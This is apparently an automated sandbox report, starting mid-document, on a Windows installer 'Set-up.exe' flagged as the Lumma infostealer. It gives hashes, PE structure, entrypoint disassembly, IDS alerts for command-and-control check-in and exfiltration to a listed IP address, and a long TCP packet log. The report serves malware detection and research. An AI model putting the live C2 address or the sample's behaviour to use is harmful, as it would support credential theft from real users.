                                                                                    • 172.67.139.144
                                                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    No created / dropped files found

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                    Entropy (8bit):4.912957308594877
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Set-up.exe
                                                                                    File size:73'935'792 bytes
                                                                                    MD5:7a7570c5afc5bf3d53854f4ae9e61457
                                                                                    SHA1:f58e3ef793b096e088438eb4df373294bf95c09b
                                                                                    SHA256:3ab888d4b341b936543bb6d48504a4530c27466c4a40b0705ef3dba5a5326b6d
                                                                                    SHA512:37c5605fca62df263ac8dd90628b4cf3ecd35a4c9b72556df98f3a92997ce90f317c00ad8606d7d7240064e92449263decef84257acc3312b07d1bbf539c5506
                                                                                    SSDEEP:786432:r5jdQMlIFsGI9Op1nkhf9FXCcb5DWk30lpu+6ecJ5OozAJCChf6:r5jerBp1khf9FVpZSBFmzECe6
                                                                                    TLSH:34F7011DA42240B5CAC705F20442EBEFDFAC91C7B30C69FB8558B829E65EEE13875275
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................,...7...............,...@...........................=.....O.h....... ............................

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x401490
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                    TLS Callbacks:0x577900, 0x5778b0, 0x586160
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:66f460940005bddd8c100e502fe04a61

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 29/09/2022 01:00:00 01/10/2023 00:59:59
                                                                                    Subject Chain
                                                                                    • CN="Chengdu Shengxuan Technology Co., Ltd.", O="Chengdu Shengxuan Technology Co., Ltd.", L=\u6210\u90fd\u5e02, S=\u56db\u5ddd\u7701, C=CN, SERIALNUMBER=91510100MA6ADXEC52, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=\u6210\u90fd\u9ad8\u65b0\u6280\u672f\u4ea7\u4e1a\u5f00\u53d1\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u56db\u5ddd\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN
                                                                                    Version:3
                                                                                    Thumbprint MD5:182448CAE21BA54F268E2431834C010A
                                                                                    Thumbprint SHA-1:95049E3871E56AD012E4A9FAF47E3ED3B24560ED
                                                                                    Thumbprint SHA-256:CB40734E877816F319B7003E8742ABF2E674853AE9E1E3F3DE48AAAF41CD9B6C
                                                                                    Serial:093ED8E100C38F343753BB55EFF93AA9

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    mov dword ptr [0077FB80h], 00000000h
                                                                                    jmp 00007F1BF4C5D6A6h
                                                                                    nop
                                                                                    sub esp, 1Ch
                                                                                    mov eax, dword ptr [esp+20h]
                                                                                    mov dword ptr [esp], eax
                                                                                    call 00007F1BF4DE0286h
                                                                                    test eax, eax
                                                                                    sete al
                                                                                    add esp, 1Ch
                                                                                    movzx eax, al
                                                                                    neg eax
                                                                                    ret
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 18h
                                                                                    mov eax, dword ptr [006CDF40h]
                                                                                    test eax, eax
                                                                                    je 00007F1BF4C5DA1Eh
                                                                                    mov dword ptr [esp], 006CE000h
                                                                                    call dword ptr [00781324h]
                                                                                    sub esp, 04h
                                                                                    test eax, eax
                                                                                    mov edx, 00000000h
                                                                                    je 00007F1BF4C5D9F8h
                                                                                    mov dword ptr [esp+04h], 006CE00Eh
                                                                                    mov dword ptr [esp], eax
                                                                                    call dword ptr [00781330h]
                                                                                    sub esp, 08h
                                                                                    mov edx, eax
                                                                                    test edx, edx
                                                                                    je 00007F1BF4C5D9EBh
                                                                                    mov dword ptr [esp], 006CDF40h
                                                                                    call edx
                                                                                    mov dword ptr [esp], 00401520h
                                                                                    call 00007F1BF4C5D96Eh
                                                                                    leave
                                                                                    ret
                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    pop ebp
                                                                                    ret
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    nop
                                                                                    mov edx, dword ptr [eax+04h]
                                                                                    test edx, edx
                                                                                    jne 00007F1BF4C5D9EDh
                                                                                    jmp 00007F1BF4C5D9F9h
                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                    mov edx, eax
                                                                                    mov eax, dword ptr [edx]
                                                                                    test eax, eax
                                                                                    jne 00007F1BF4C5D9DAh
                                                                                    mov eax, edx
                                                                                    ret
                                                                                    nop
                                                                                    lea esi, dword ptr [esi+00h]
                                                                                    mov edx, dword ptr [eax+08h]
                                                                                    test edx, edx
                                                                                    je 00007F1BF4C5D9FBh

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3810000x1130.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d80000xa90.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x467fbd00x2fe0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x377c600x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3812d40x298.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x2c946c0x2c96009cf47fc347cdbbf130eddec516aa1240unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .data0x2cb0000x2f440x3000130b4e00ce634bad52c053e1574fe9a9False0.280517578125data3.243424224347642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rdata0x2ce0000xb08f00xb0a00bea2499c0e1df9cd97a030da848314acFalse0.2471014132165605data6.065462763185077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                    .bss0x37f0000x17200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .idata0x3810000x11300x1200942388f17ddd7b3b9e942aa3e25ef1f0False0.3721788194444444data5.188836074181512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .CRT0x3830000x380x200d5aa9775f71d308d7c3bf602d41f42e9False0.080078125Matlab v4 mat-file (little endian) \220xW, numeric, rows 4198688, columns 00.32492027068200274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .tls0x3840000x53e000x53e00f595e5ebf5bb869b2eb4cc0b46d0d7ffFalse0.6724862611773472data7.476446820068237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x3d80000xa900xc00ff44ed8a59e9a32256eeb1abc91aa665False0.3479817708333333data4.84698912941843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x3d80b80x230dataUkrainianUkrain0.5035714285714286
                                                                                    RT_MANIFEST0x3d82e80x528XML 1.0 document, ASCII text, with CRLF line terminators0.4643939393939394
                                                                                    RT_MANIFEST0x3d88100x280XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.553125

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllAddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileW, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSize, GetFileSizeEx, GetHandleInformation, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNamedPipeClientProcessId, GetProcAddress, GetProcessAffinityMask, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount64, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryFullProcessImageNameA, RaiseException, ReadFile, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
                                                                                    msvcrt.dll__getmainargs, __initenv, __lconv_init, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _beginthreadex, _cexit, _endthreadex, _errno, _fileno, _get_osfhandle, _initterm, _iob, _isatty, _lock, _onexit, _setjmp3, _strdup, _strnicmp, _ultoa, _unlock, abort, atof, atoi, calloc, clearerr, exit, fclose, feof, ferror, fflush, fgetc, fopen, fprintf, fputc, fputs, fread, free, frexp, fwrite, getc, getenv, isalpha, isprint, isspace, iswctype, localeconv, malloc, mbstowcs, memchr, memcmp, memcpy, memmove, memset, gmtime, printf, putc, qsort, realloc, remove, setlocale, setvbuf, signal, strcat, strchr, strcmp, strcoll, strcpy, strerror, strftime, strlen, strncmp, strncpy, strrchr, strstr, strtol, strtoul, strxfrm, tolower, toupper, towlower, towupper, ungetc, vfprintf, time, wcscoll, wcsftime, wcslen, wcsxfrm, longjmp, _write, _strdup, _setmode, _fileno, _fdopen

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    UkrainianUkrain
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-12T15:20:13.124090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.139.144443TCP
                                                                                    2025-01-12T15:20:14.149231+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732172.67.139.144443TCP
                                                                                    2025-01-12T15:20:14.149231+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.139.144443TCP
                                                                                    2025-01-12T15:20:14.615838+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.139.144443TCP
                                                                                    2025-01-12T15:20:15.116755+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733172.67.139.144443TCP
                                                                                    2025-01-12T15:20:15.116755+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.139.144443TCP
                                                                                    2025-01-12T15:20:15.818900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.139.144443TCP
                                                                                    2025-01-12T15:20:17.106777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.139.144443TCP
                                                                                    2025-01-12T15:20:17.580047+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.139.144443TCP
                                                                                    2025-01-12T15:20:18.280695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.139.144443TCP
                                                                                    2025-01-12T15:20:21.757785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.139.144443TCP
                                                                                    2025-01-12T15:20:23.442162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.139.144443TCP
                                                                                    2025-01-12T15:20:26.618370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.139.144443TCP
                                                                                    2025-01-12T15:20:27.974091+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745172.67.139.144443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 12, 2025 15:20:12.646370888 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:12.646393061 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:12.646457911 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:12.648998976 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:12.649012089 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:13.123961926 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:13.124089956 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:13.160512924 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:13.160533905 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:13.160914898 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:13.207465887 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:13.384536982 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:13.384556055 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:13.384658098 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.149202108 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.149274111 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.149327040 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.150636911 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.150649071 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.150659084 CET49732443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.150662899 CET44349732172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.158315897 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.158409119 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.158504009 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.158849001 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.158888102 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.615753889 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.615838051 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.616894960 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.616919994 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.617142916 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:14.618093014 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.618134022 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:14.618180037 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116544962 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116594076 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116625071 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116652012 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.116708994 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116748095 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.116770029 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.116925001 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116970062 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.116971016 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.116985083 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.117026091 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.117450953 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.160599947 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203063965 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203140020 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203164101 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203202009 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203226089 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203254938 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203284979 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203326941 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203466892 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203500032 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.203524113 CET49733443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.203536987 CET44349733172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.362643003 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.362678051 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.362734079 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.362977028 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.362987995 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.818819046 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.818900108 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.842443943 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.842457056 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.842705965 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.865037918 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.865148067 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.865175962 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:15.865225077 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:15.865231037 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:16.496027946 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:16.496107101 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:16.496201992 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:16.496265888 CET49734443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:16.496277094 CET44349734172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:16.623943090 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:16.624032021 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:16.624114037 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:16.624571085 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:16.624624014 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.106558084 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.106776953 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.108421087 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.108450890 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.109297037 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.110527039 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.110642910 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.110676050 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.580065966 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.580406904 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.580593109 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.581332922 CET49735443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.581372023 CET44349735172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.792392015 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.792484045 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:17.792603016 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.792871952 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:17.792912006 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:18.280369997 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:18.280694962 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:18.292406082 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:18.292455912 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:18.293528080 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:18.337877989 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:18.338059902 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:18.338161945 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:18.338233948 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:18.338249922 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:20.436995983 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:20.437235117 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:20.437433958 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:20.437515974 CET49736443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:20.437555075 CET44349736172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.261101007 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.261133909 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.261192083 CET49737443192.168.2.4172.67.139.144
